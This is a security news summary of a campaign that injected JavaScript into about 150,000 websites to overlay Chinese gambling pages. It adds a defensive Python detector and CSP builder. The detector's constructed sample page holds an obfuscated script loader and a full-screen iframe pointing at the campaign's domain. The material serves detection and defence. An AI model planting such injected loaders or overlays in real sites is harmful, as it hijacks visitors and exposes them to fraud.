
A widespread cyber campaign has compromised approximately 150,000 legitimate websites by injecting malicious JavaScript code that redirects visitors to Chinese-language gambling platforms. The attack, which leverages iframe injections to display deceptive full-screen overlays, has been active for years but has recently expanded in scale and sophistication. Security analysts note that the threat actors behind this operation have updated their techniques while maintaining the same core method of exploitation.
TL;DR: Key Points
- Scope: Over 150,000 websites infected with malicious JavaScript.
- Technique: Iframe injections used to display fraudulent gambling overlays.
- Payload Delivery: Scripts hosted on domains like zuizhongyj[.]com with obfuscation to evade detection.
- Targets: Primarily Chinese-speaking users in China, Hong Kong, and the U.S.
- Mitigation: Implement Content Security Policies (CSPs) and audit third-party scripts.
Attack Mechanics and Infrastructure
The campaign relies on injecting malicious JavaScript into vulnerable websites, often through outdated plugins or server-side PHP code. Once executed, the script loads an iframe that overlays the legitimate site with a full-screen gambling advertisement, mimicking well-known platforms like Bet365. The payload is hosted on intermediary domains such as zuizhongyj[.]com, which use hexadecimal encoding and HTML entity tricks to bypass security filters.
“The threat actor has slightly revamped their interface but is still relying on an iframe injection to display a full-screen overlay in the visitor’s browser,” said Himanshu, a security analyst at c/side.
Broader Campaigns and Threat Actors
This operation shares similarities with the DollyWay malware, which has been linked to the cybercriminal network VexTrio. Since 2016, VexTrio has compromised over 20,000 sites, monetizing traffic through ad brokers like LosPollos and PropellerAds. The group has demonstrated adaptability, shifting command-and-control (C2) infrastructure to platforms like Telegram after previous disruptions.
Mitigation and Defense Strategies
To defend against such attacks, organizations should:
- Regularly audit third-party scripts and plugins for unauthorized modifications.
- Implement Content Security Policies (CSPs) to restrict unauthorized script execution.
- Monitor for unexpected iframes or redirects in web traffic.
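The following is an added example, not code from the article or from c/side, showing how the last two steps can be checked against a page: it undoes the hex-escape and HTML-entity encodings the campaign uses, flags script and iframe sources outside a site allowlist and any iframe styled to cover the whole viewport, and builds a CSP that would have blocked both injections. The sample page fragment and the allowlisted host cdn.legit-example.com are constructed for the demonstration.

```python
import html
import re
from urllib.parse import urlparse

# Constructed sample (not from the article): one legitimate script, an injected
# loader whose URL hides behind JS hex escapes, and an injected full-screen
# iframe whose src is written as HTML entities.
SAMPLE_HTML = r"""<html><body>
<script src="https://cdn.legit-example.com/app.js"></script>
<script>var s=document.createElement('script');
s.src="\x68\x74\x74\x70\x73\x3a\x2f\x2f\x7a\x75\x69\x7a\x68\x6f\x6e\x67\x79\x6a\x2e\x63\x6f\x6d/js/c.js";
document.body.appendChild(s);</script>
<iframe src="&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;zuizhongyj.com/bet.html"
 style="position:fixed;top:0;left:0;width:100%;height:100%;z-index:99999"></iframe>
</body></html>"""

ALLOWED_HOSTS = {"cdn.legit-example.com"}  # assumption: the site's known-good script origins

HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")
TAG_SRC = re.compile(r'''<(script|iframe)\b[^>]*?\ssrc\s*=\s*["']([^"']+)["']''', re.I)
JS_SRC = re.compile(r'''\.src\s*=\s*["']([^"']+)["']''', re.I)
IFRAME_TAG = re.compile(r"<iframe\b[^>]*>", re.I)

def deobfuscate(text: str) -> str:
    """Undo the two encodings the article names: backslash-x hex escapes and HTML entities."""
    text = HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)
    return html.unescape(text)

def is_fullscreen_overlay(tag: str) -> bool:
    """True when an iframe is pinned over the whole viewport, as the gambling overlay is."""
    style = re.sub(r"\s+", "", tag.lower())
    return "position:fixed" in style and "width:100%" in style and "height:100%" in style

def find_injections(page: str, allowed_hosts=ALLOWED_HOSTS) -> list[dict]:
    """Report script/iframe sources not on the allowlist and any full-screen iframe."""
    text = deobfuscate(page)  # match on decoded content, not on the obfuscated bytes
    findings = []
    sources = [(kind.lower(), url) for kind, url in TAG_SRC.findall(text)]
    sources += [("script", url) for url in JS_SRC.findall(text)]  # dynamically created tags
    for kind, url in sources:
        host = urlparse(url).hostname or ""
        if host and host not in allowed_hosts:
            findings.append({"kind": kind, "host": host, "reason": "unlisted origin"})
    for tag in IFRAME_TAG.findall(text):
        if is_fullscreen_overlay(tag):
            findings.append({"kind": "iframe", "host": None, "reason": "full-screen overlay"})
    return findings

def csp_header(allowed_hosts=ALLOWED_HOSTS) -> str:
    """CSP allowing only listed script origins (no inline scripts) and no framed content."""
    scripts = " ".join(sorted("https://" + h for h in allowed_hosts))
    return f"default-src 'self'; script-src 'self' {scripts}; frame-src 'none'; object-src 'none'"
```

Run `find_injections(SAMPLE_HTML)` to see the three findings; the `csp_header()` value is what the site would send in its Content-Security-Policy response header.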
Conclusion
This campaign highlights the persistent threat of client-side attacks, particularly those leveraging obfuscation and deceptive overlays. Security teams should prioritize script integrity checks and adopt proactive measures to detect and block such injections. As attackers continue to refine their techniques, maintaining vigilance and applying layered defenses will be essential in mitigating risks.
References
- “150,000 Sites Compromised by JavaScript Injection Promoting Chinese Gambling Platforms”, The Hacker News. [Accessed: 2025-03-01].
- “Threat Actors Compromise 150,000 Websites”, GBHackers. [Accessed: 2025-03-01].
- “Over 150K Websites Hit by Full-Page Hijack Linking to Chinese Gambling Sites”, c/side Analysis. [Accessed: 2025-03-01].